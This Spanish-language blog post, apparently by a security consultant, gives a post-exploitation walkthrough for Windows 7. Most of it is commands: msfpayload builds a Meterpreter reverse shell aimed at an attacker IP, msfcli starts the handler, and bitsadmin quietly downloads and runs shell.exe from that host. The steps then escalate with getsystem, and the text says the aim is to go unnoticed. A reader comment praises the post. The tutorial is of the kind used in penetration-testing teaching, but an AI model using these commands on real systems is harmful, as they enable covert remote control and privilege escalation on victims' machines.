bitsadmin_example

Durante la parte de post-explotación de un sistema operativo como Windows 7 , es muy importante poder preservar el control , para ello es necesario descargar y ejecutar nuestros shell reversos, y evidentemente tiene que pasar desapercibido.

Para esto en Windows 7 encontramos BITS “Servicio de transferencia inteligente en segundo plano de Microsoft”. Se utiliza para transferir archivos, entre otras cosas.

Planteemos este escenario:

Contamos con una consola de DOS en Windows 7 , obtenida de alguna forma, (con netcat por ejemplo) sin embargo una consola DOS, muchas veces es muy limitada, ya que necesitamos ejecutar comandos mas complejos, entonces nos ponemos a trabajar para tener nuevamente una sesión de Meterpreter, apoyándonos en BITS , de la siguiente forma:

En Kali Linux creamos un Payload con Metasploit donde la IP 10.10.88.236 es la IP de Kali

#msfpayload windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 X > /var/www/shell.exe

Ahora abriremos el handler de Metasploit

msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp lhost=10.10.88.236 lport=1234 E

En la consola de Windows que tenemos, descargaremos el shell.exe de la maquina Kali Linux

C:\Windows\system32> cd Users
C:\Windows\system32> cd ecornejo
C:\Windows\system32> cd Destktop

C:\Windows\system32> bitsadmin /create proceso1
C:\Windows\system32> bitsadmin /addfile proceso1 http://10.10.88.236/shell.exe  c:\Users\ecornejo\Desktop\shell.exe
C:\Windows\system32> bitsadmin /resume proceso1
C:\Windows\system32> bitsadmin /complete proceso1

Con esto realizado, tendremos nuestro shell.exe en el escritorio del usuario , ahora lo ejecutaremos

C:\Windows\system32> cd c:\Users\ecornejo\Desktop
C:\Windows\system32> shell.exe

Si todo salio bien tendremos una sesión de Meterpreter activa y lista para volver a tomar el control

meterpreter > getuid
meterpreter > getsystem

Nota: Es evidente que no es la única forma , también esta el hecho de que un antivirus puede detectar nuestro exe, sin embargo para eso también existen otros mecanismos , espero les sirva.

Referencias:
http://technet.microsoft.com/en-us/magazine/ff382721.aspx

http://msdn.microsoft.com/en-us/library/aa362813%28v=vs.85%29.aspx

Una respuesta a «Post Explotación de Windows 7 con BITSADMIN»

  1. Avatar de Alexis Morán
    Alexis Morán

    Excelente como siempre profesor Juan Oliva.

Replica a Alexis Morán Cancelar la respuesta

Juan Oliva

Consultor en Ciberseguridad con mas de 17 años de experiencia en el campo, muy involucrado en proyectos de Ethical Hacking, análisis y explotación de vulnerabilidades en infraestructura, aplicaciones web, APIs y Móviles, pruebas de ingeniería social y revisión de código.